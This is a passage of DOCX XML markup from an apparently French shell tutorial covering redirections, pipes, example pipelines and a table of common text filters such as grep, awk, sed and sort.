              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Les six redirections indispensables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commande &gt; sortie.txt          # écrase le fichier</w:t>
        <w:br/>
        <w:t>commande &gt;&gt; sortie.txt         # ajoute à la fin</w:t>
        <w:br/>
        <w:t>commande 2&gt; erreurs.txt        # erreurs seules</w:t>
        <w:br/>
        <w:t>commande &gt; tout.txt 2&gt;&amp;1       # les deux dans le même fichier</w:t>
        <w:br/>
        <w:t>commande &amp;&gt; tout.txt           # forme courte (bash)</w:t>
        <w:br/>
        <w:t>commande 2&gt;/dev/null           # ignore les erreurs</w:t>
        <w:br/>
        <w:t>commande &lt; entree.txt          # lit depuis un fichier</w:t>
        <w:br/>
        <w:br/>
        <w:t># Pipe : la sortie d'une commande devient l'entrée de la suivante</w:t>
        <w:br/>
        <w:t>ls -l | wc -l</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`&gt;` ÉCRASE SANS AVERTIR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une faute de frappe sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> à la place de </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> détruit un fichier. Activez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>set -o noclobber</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dans vos scripts pour interdire l'écrasement accidentel, et utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&gt;|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> lorsque l'écrasement est volontaire.</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TUBE (PIPE)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Connexion entre la sortie standard d'un processus et l'entrée standard du suivant. Les deux s'exécutent en parallèle et traitent les données en flux, sans fichier intermédiaire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>48.2 Composer avec les tubes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une commande complexe se construit par étapes, chacune vérifiable. La règle est simple : on construit progressivement, en regardant le résultat à chaque ajout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois compositions utiles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Les 5 plus gros fichiers de /var</w:t>
        <w:br/>
        <w:t>du -ah /var 2&gt;/dev/null | sort -rh | head -5</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les 10 adresses IP les plus fréquentes dans un journal</w:t>
        <w:br/>
        <w:t>awk '{print $1}' /var/log/nginx/access.log | sort | uniq -c | sort -rn | head</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -10</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les erreurs d'hier, sans les avertissements</w:t>
        <w:br/>
        <w:t>journalctl --since yesterday -p err | grep -v "warning" | wc -l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="59" name="Picture 59"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f57.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId89"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.57 — Un tube, étape par étape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.167 — Dix filtres essentiels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02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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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310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Option utile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2020"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>grep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Filtrer par motif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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awk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Extraire des colonnes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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{print $n}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2020"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Remplacer du texte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>s/a/b/g</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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sort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Trier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2020"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>uniq</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dédoublonner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (après tri)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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cut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Découper par caractère</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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-d -f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2020"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>wc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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head</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Début ou fin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2020"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3885"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Transliterer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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xargs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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Transformer en arguments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>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-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>-P</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
